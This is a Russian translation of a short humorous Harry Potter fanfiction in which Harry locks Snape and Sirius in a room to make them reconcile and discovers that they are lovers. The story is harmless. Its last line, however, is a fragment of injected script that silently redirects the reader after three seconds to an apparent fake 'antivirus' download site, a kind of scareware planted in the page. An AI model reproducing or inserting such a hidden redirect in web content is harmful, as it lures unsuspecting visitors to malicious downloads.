Простая просьба
A Simple Request

Автор: Fabula Rasa
Переводчик: Fagot aka профессор Коровьев
(разрешение на перевод от 20.12.03 получено)
Оригинал: лежит тут
Pairing: Гарри/Северус/Сириус
Rating:  PG
Жанр: юмор
Дисклеймер: все права принадлежат Роулинг.
Размещение: с разрешения переводчика
 

- Ладно, Гарри. Я здесь, как ты и просил. В семь утра. Мы оба пришли, - Сириус бросил осторожный взгляд на Снейпа. – Так что ты хотел?

Гарри тяжело вздохнул и посмотрел на раздражённого крёстного. Нахмурившегося профессора Снейпа, присевшего на подоконник и скрестившего руки, юноша полностью проигнорировал.

- Ну... ты же знаешь, что сегодня – мой последний учебный день в Хогвардсе.

- Знаю, - Сириус выглядел озадаченным.

- Несколько недель назад ты спрашивал, что бы я хотел получить в подарок, когда закончу школу.

- Ради всего святого, мистер Поттер! Вы дали мне понять, что у вас есть вопросы по поводу ваших экзаменационных результатов. В этом разговоре есть какой-нибудь смысл? И, может, вы посвятите нас в него до того, как начнётся завтрак? – прорычал Снейп.

- Конечно, сэр, - Гарри отступил под тяжёлым взглядом профессора алхимии. – Хорошо, дело в том… - юноша посмотрел на Снейпа, - может, вы и не знаете, сэр, или вам это неинтересно, но за последние несколько лет, наблюдая как вы смело сражались с Волдемортом и как многим рисковали ради нас, я… В общем, хочу сказать, что восхищаюсь вами… может, даже больше, чем можете себе представить…

- Просто умереть от счастья, Поттер! Вашего восхищения с лихвой хватит, чтобы понять: как не напрасны были мои жертвы! – из уст Снейпа так и лился сарказм, но Гарри не обратил внимания.

- И ты, Сириус… Ну, знаешь сам, сколько значишь для меня… Ты для меня практически как отец… Даже больше, чем "как"… - взгляд Сириуса сразу потеплел, и он улыбнулся.

- Спасибо, Гарри! Ты для меня – всё на свете!

- Телячьи нежности… Вы закончили? – Снейп поднялся и направился к выходу.

- Простите, сэр, но это ещё не всё. Infixa Klaustra! – сказал Гарри, взмахнув палочкой в сторону двери.

Щёлкнул замок. Глаза Снейпа налились кровью

- Мистер Поттер! Учинять препятствия между мною и моей первой семичасовой чашкой кофе – занятие очень опасное, поверьте! Немедленно откройте дверь!

- Нет, сэр. Только после того, как вы оба меня выслушаете.

- Гарри! У меня и у профессора Снейпа через час начинаются занятия. Если ты хотел что-нибудь нам сказать, то мог бы найти другой способ обратить наше внимание.

- Пытался уже, - мрачно произнёс Гарри. – Короче, дело в следующем: вы двое – люди, которыми я восхищаюсь больше всего на свете. Попридержите свой сарказм, - бросил он Снейпу, петушиные брови которого взлетели почти до самых небес. – У вас больше нет возможности оставлять меня после занятий. Тем более, мне также известно, что я вам нравлюсь.

Снейп чуть не задохнулся.

- Есть нечто, что я хочу получить от вас обоих прежде, чем открою дверь: чтобы вы оба терпимо относились друг к другу. Хочу, чтобы двое великих участника войны нашли общий язык и увидели то хорошее, что есть в каждом из вас. Я не рассчитываю на вашу дружбу, хотя питаю надежду… Может, когда-нибудь… Хочу, чтобы вы прямо сейчас пообещали мне хотя бы попробовать… Особенно ты, Сириус, - Гарри посмотрел на крёстного умоляюще.

Сириус бросил на Гарри скептический взгляд.

- Иными словами, ты хочешь, чтобы в честь твоего окончания Хогвардса мы с профессором Снейпом стали друзьями?

- Именно!

- Что ж… хм… - Сириус нахмурился. – Гарри, я думал, ты понял…   

- Знаю-знаю, - перебил Гарри. – Позади десять лет открытой ненависти друг к другу, и я не жду от вас, что это может исчезнуть в одно мгновение, но неужели нельзя попытаться?

- Гарри! Профессор Снейп и я вовсе не ненавидим друг друга.

- Не верю. Ты говоришь это только для того, чтобы я выпустил вас отсюда. Ну уж дудки: вам придётся постараться убедить меня. И вот ещё что. Я прекрасно понимаю, что есть темы, которые вы должны обсудить и прийти к общему решению, можете не торопиться. Я разговаривал с Дамблдором, и он пообещал отменить ваши утренние занятия. У меня есть разрешение на всё…

- Святой Мерлин! Держу пари, что этот старый лысый садист так и сделал! Блэк, мы проторчим тут до вечера, если оставить инициативу в твоих руках, - Снейп поднялся и направился к Сириусу. – Мистер Поттер, если профессор Блэк и я докажем вам, что в самом деле не ненавидим друг друга, вы дадите мне возможность насладиться чашечкой кофе?

Гарри кивнул:

- Но я не представляю, как вы…

Он поперхнулся от увиденного: Снейп стиснул Сириуса в своих объятиях для всёсокрушающего поцелуя, и крёстный ответил ему тем же. Не просто ответил – ответил страстно. Сириус поднял руки, чтобы притянуть к себе голову Снейпа, чьи руки скользнули по спине вниз, ещё крепче обнимая Блэка. Две чёрных мантии и чёрные волосы слились в одно целое. Руки Северуса опустились ещё ниже и крепко держали Сириуса за задницу. Казалось, эти двое знают, что делают. Гарри даже подумал, что кто-нибудь из них обязательно сломает себе челюсть. Спустя немного времени Снейп отстранился от Блэка, внимательно посмотрел на него, словно удовлетворённо оценивая проделанную работу, и поправил жилетку.

- Теперь немедленно откройте дверь, Поттер!

Гарри набрал в лёгкие воздух, нащупал палочку и неуверенно направил её на дверь.

- Relicta clausrta, - хриплым голосом пробормотал он.

Снейп беззвучно выскользнул за дверь, оставив юношу в полной растерянности.

- Гарри, ты в порядке?

- Он… ты… но, - Гарри замолчал, осознав, что он хочет сказать.

- Неправильно, что я не решился рассказать тебе…

- Рассказать мне… Но, Сириус, вы… я хочу сказать… вы двое…

- Любовники? Да, Гарри и уже давно. Признаться, я был уверен, что ты знаешь.

- И… к-как давно? – Гарри был уверен, что его заикание останется навечно.

- Ещё с конца войны. Когда были уверены, что оба погибнем. Но этого не произошло, - Сириус внимательно посмотрел на крестника. – Знаешь, если тебе неприятно… ну то, что я… Ты воспитывался у магглов, с этими их предрассудками…

- Нет-нет, дело не в этом… просто пытаюсь всё это переварить…

- Ладно, я дам тебе немного времени. Слишком бурные события для семи утра, - уголки губ Сириуса скривились в усмешке.

- И ничего смешного! – нахмурился Гарри.

Сириус прикрыл рот рукой, чтобы скрыть улыбку.

- На самом деле это было ужасно смешно, - Сириус похлопал Гарри по плечу и вместе с ним направился к выходу. – Давай перекусим, пока не начались твои последние учебные занятия. Тебе необходимо подкрепиться перед алхимией: у меня такое чувство, что Северус постарается, чтобы ты надолго запомнил этот урок.

Гарри застонал:

- Ладно хоть, что свой подарок я уже получил – к обеду от меня останутся рожки да ножки.

 

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>